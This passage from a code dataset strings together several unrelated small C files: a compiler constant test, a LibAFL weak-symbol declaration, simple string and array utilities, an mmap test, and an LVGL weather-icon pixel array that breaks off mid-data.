576, 577, 578, 579, 580, 581, 582, 583, 584, 585, 586, 587, 588, 589, 590, 591, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 592, 593, 594, 595, 596, 597, 598, 599, 600, 601, 602, 603, 604, 605, 606, 607, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 608, 609, 610, 611, 612, 613, 614, 615, 616, 617, 618, 619, 620, 621, 622, 623, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 624, 625, 626, 627, 628, 629, 630, 631, 632, 633, 634, 635, 636, 637, 638, 639, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 640, 641, 642, 643, 644, 645, 646, 647, 648, 649, 650, 651, 652, 653, 654, 655, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 656, 657, 658, 659, 660, 661, 662, 663, 664, 665, 666, 667, 668, 669, 670, 671, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 672, 673, 674, 675, 676, 677, 678, 679, 680, 681, 682, 683, 684, 685, 686, 687, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 688, 689, 690, 691, 692, 693, 694, 695, 696, 697, 698, 699, 700, 701, 702, 703, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 704, 705, 706, 707, 708, 709, 710, 711, 712, 713, 714, 715, 716, 717, 718, 719, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 720, 721, 722, 723, 724, 725, 726, 727, 728, 729, 730, 731, 732, 733, 734, 735, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 736, 737, 738, 739, 740, 741, 742, 743, 744, 745, 746, 747, 748, 749, 750, 751, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 752, 753, 754, 755, 756, 757, 758, 759, 760, 761, 762, 763, 764, 765, 766, 767, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 768, 769, 770, 771, 772, 773, 774, 775, 776, 777, 778, 779, 780, 781, 782, 783, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 784, 785, 786, 787, 788, 789, 790, 791, 792, 793, 794, 795, 796, 797, 798, 799, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 800, 801, 802, 803, 804, 805, 806, 807, 808, 809, 810, 811, 812, 813, 814, 815, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 816, 817, 818, 819, 820, 821, 822, 823, 824, 825, 826, 827, 828, 829, 830, 831, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 832, 833, 834, 835, 836, 837, 838, 839, 840, 841, 842, 843, 844, 845, 846, 847, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 848, 849, 850, 851, 852, 853, 854, 855, 856, 857, 858, 859, 860, 861, 862, 863, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 864, 865, 866, 867, 868, 869, 870, 871, 872, 873, 874, 875, 876, 877, 878, 879, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 880, 881, 882, 883, 884, 885, 886, 887, 888, 889, 890, 891, 892, 893, 894, 895, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 896, 897, 898, 899, 900, 901, 902, 903, 904, 905, 906, 907, 908, 909, 910, 911, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 912, 913, 914, 915, 916, 917, 918, 919, 920, 921, 922, 923, 924, 925, 926, 927, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 928, 929, 930, 931, 932, 933, 934, 935, 936, 937, 938, 939, 940, 941, 942, 943, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 944, 945, 946, 947, 948, 949, 950, 951, 952, 953, 954, 955, 956, 957, 958, 959, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 960, 961, 962, 963, 964, 965, 966, 967, 968, 969, 970, 971, 972, 973, 974, 975, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 976, 977, 978, 979, 980, 981, 982, 983, 984, 985, 986, 987, 988, 989, 990, 991, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 992, 993, 994, 995, 996, 997, 998, 999, 1000, 1001, 1002, 1003, 1004, 1005, 1006, 1007, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 1008, 1009, 1010, 1011, 1012, 1013, 1014, 1015, 1016, 1017, 1018, 1019, 1020, 1021, 1022, 1023, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999 };
the_stack_data/729346.c
// Check that integer constants are preserved void integer01() { int i, j, k; i = 1; j = 01; k = 001; }
the_stack_data/153269381.c
#include<stddef.h> __attribute__((weak, visibility("default"))) size_t *__libafl_target_list;
the_stack_data/86075309.c
/* ** my_strlen.c for My String Length in /home/salfai/etna/devc/Jour_03/hussai_f/my_strlen ** ** Made by HUSSAIN Faisal ** Login <[email protected]> ** ** Started on Wed Oct 21 11:35:57 2015 HUSSAIN Faisal ** Last update Sat Oct 24 16:54:27 2015 HUSSAIN Faisal */ int my_strlen(char *str) { int length; length = 0; while (*(str + length) != 0) length++; return (length); }
the_stack_data/27189.c
// RUN: %clang %s -o %t && %run %t #include <assert.h> #include <sys/mman.h> int main() { char *buf = (char *)mmap(0, 100000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); assert(buf); munmap(buf, 100000); }
the_stack_data/111078884.c
/* ************************************************************************** */ /* */ /* ::: :::::::: */ /* ft_rev_int_tab.c :+: :+: :+: */ /* +:+ +:+ +:+ */ /* By: juolivei <[email protected]> +#+ +:+ +#+ */ /* +#+#+#+#+#+ +#+ */ /* Created: 2019/10/08 18:38:07 by juolivei #+# #+# */ /* Updated: 2019/10/08 21:09:08 by juolivei ### ########.fr */ /* */ /* ************************************************************************** */ void ft_rev_int_tab(int *tab, int size) { int end; int begin; int swap; end = size; begin = 0; while (end > begin) { end--; swap = tab[end]; tab[end] = tab[begin]; tab[begin] = swap; begin++; } }
the_stack_data/1150461.c
#include <stdio.h> #include <stdlib.h> #include <stdint.h> #define LV_ATTRIBUTE_MEM_ALIGN #define LV_ATTRIBUTE_IMG_ALARM_16PX #define LV_COLOR_DEPTH 32 //#define LV_COLOR_DEPTH 16 #define LV_IMG_PX_SIZE_ALPHA_BYTE 4 /* for 32 bit color */ //#define LV_IMG_PX_SIZE_ALPHA_BYTE 3 /* for 16 bit color */ #define LV_IMG_CF_TRUE_COLOR_ALPHA 5 /* for 32 bit color */ // #define LV_IMG_CF_TRUE_COLOR_ALPHA 3 /* for 16 bit color */ // #define LV_COLOR_16_SWAP 1 /** Image header it is compatible with * the result from image converter utility*/ typedef struct { uint32_t cf : 5; /* Color format: See `lv_img_color_format_t`*/ uint32_t always_zero : 3; /*It the upper bits of the first byte. Always zero to look like a non-printable character*/ uint32_t reserved : 2; /*Reserved to be used later*/ uint32_t w : 11; /*Width of the image map*/ uint32_t h : 11; /*Height of the image map*/ } lv_img_header_t; typedef struct { lv_img_header_t header; uint32_t data_size; const uint8_t * data; } lv_img_dsc_t; #ifndef LV_ATTRIBUTE_MEM_ALIGN #define LV_ATTRIBUTE_MEM_ALIGN #endif #ifndef LV_ATTRIBUTE_IMG_OWM_50D_64PX #define LV_ATTRIBUTE_IMG_OWM_50D_64PX #endif const LV_ATTRIBUTE_MEM_ALIGN LV_ATTRIBUTE_IMG_OWM_50D_64PX uint8_t owm_50d_64px_map[] = { #if LV_COLOR_DEPTH == 1 || LV_COLOR_DEPTH == 8 /*Pixel format: Alpha 8 bit, Red: 3 bit, Green: 3 bit, Blue: 2 bit*/ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xfc, 0x00, 0xfc, 0x00, 0xfc, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xfc, 0x00, 0xfc, 0x00, 0xfc, 0x00, 0x00, 0x00, 0xfc, 0x00, 0xfc, 0x0f, 0xfc, 0x00, 0x00, 0x00, 0xfc, 0x00, 0xfc, 0x00, 0xfc, 0x00, 0xfc, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xfc, 0x00, 0xfc, 0x00, 0xfc, 0x00, 0x00, 0x00, 0xfc, 0x00, 0xfc, 0x23, 0xfc, 0x3c, 0xfc, 0x00, 0xfc, 0x00, 0xfc, 0x20, 0xfc, 0xd4, 0xfc, 0x00, 0xfc, 0x00, 0xf8, 0x00, 0xfc, 0x84, 0xfc, 0x00, 0xfc, 0x00, 0xfc, 0x00, 0xfc, 0x00, 0xfc, 0x00, 0xfc, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xfc, 0x00, 0xfc, 0x23, 0xfc, 0x0b, 0xfc, 0x00, 0xfc, 0x00, 0xfc, 0x7b, 0xfc, 0xff, 0xfc, 0x38, 0xfc, 0x00, 0xfc, 0xa7, 0xfc, 0xff, 0xfc, 0x84, 0xfc, 0x00, 0xfc, 0x58, 0xfc, 0xff, 0xfc, 0x5c, 0xfc, 0x00, 0xfc, 0x00, 0xfc, 0x2f, 0xfc, 0x20, 0xfc, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xfc, 0x00, 0xfc, 0x00, 0xfc, 0x00, 0xfc, 0x00, 0xfc, 0x6f, 0xfc, 0xef, 0xfc, 0x2b, 0xfc, 0x00, 0xfc, 0xe7, 0xfc, 0xff, 0xfc, 0xef, 0xfc, 0x58, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xeb, 0xfc, 0x58, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xc7, 0xfc, 0x00, 0xfc, 0x4b, 0xfc, 0xff, 0xfc, 0x4f, 0xfc, 0x00, 0xfc, 0x00, 0xfc, 0x00, 0xfc, 0x00, 0xfc, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xfc, 0x14, 0xfc, 0x13, 0xfc, 0x00, 0xfc, 0x00, 0xfc, 0x97, 0xfc, 0xff, 0xfc, 0xf8, 0xfc, 0x9b, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xfc, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xef, 0xfc, 0xb8, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0x78, 0xfc, 0x00, 0xfc, 0x00, 0xfc, 0x3f, 0xfc, 0x0c, 0xfc, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xfc, 0x2f, 0xfc, 0xff, 0xfc, 0x8c, 0xfc, 0x17, 0xfc, 0xc0, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xab, 0xfc, 0x24, 0xfc, 0xac, 0xfc, 0xff, 0xfc, 0x00, 0xfc, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe0, 0x00, 0xfc, 0x00, 0xfc, 0x00, 0xfc, 0x00, 0xfc, 0x27, 0xfc, 0xf8, 0xfc, 0xff, 0xfc, 0xef, 0xfc, 0xf8, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xf7, 0xfc, 0xfb, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0x00, 0xfc, 0x00, 0xfc, 0x00, 0xfc, 0x00, 0xfc, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xfc, 0x00, 0xfc, 0x63, 0xfc, 0x38, 0xfc, 0x1b, 0xfc, 0x27, 0xfc, 0xf3, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xef, 0xf8, 0x00, 0xfc, 0x1f, 0xfc, 0x43, 0xfc, 0x30, 0xfc, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xfc, 0x00, 0xfc, 0x8b, 0xfc, 0xff, 0xfc, 0xec, 0xfc, 0xdc, 0xfc, 0xfb, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xf8, 0xfc, 0xd7, 0xfc, 0xf0, 0xfc, 0xff, 0xfc, 0x30, 0xfc, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xfc, 0x00, 0xfc, 0x00, 0xfc, 0x00, 0xfc, 0x00, 0xfc, 0x2c, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xe7, 0xfc, 0x14, 0xfc, 0x00, 0xfc, 0x00, 0xfc, 0x00, 0xfc, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 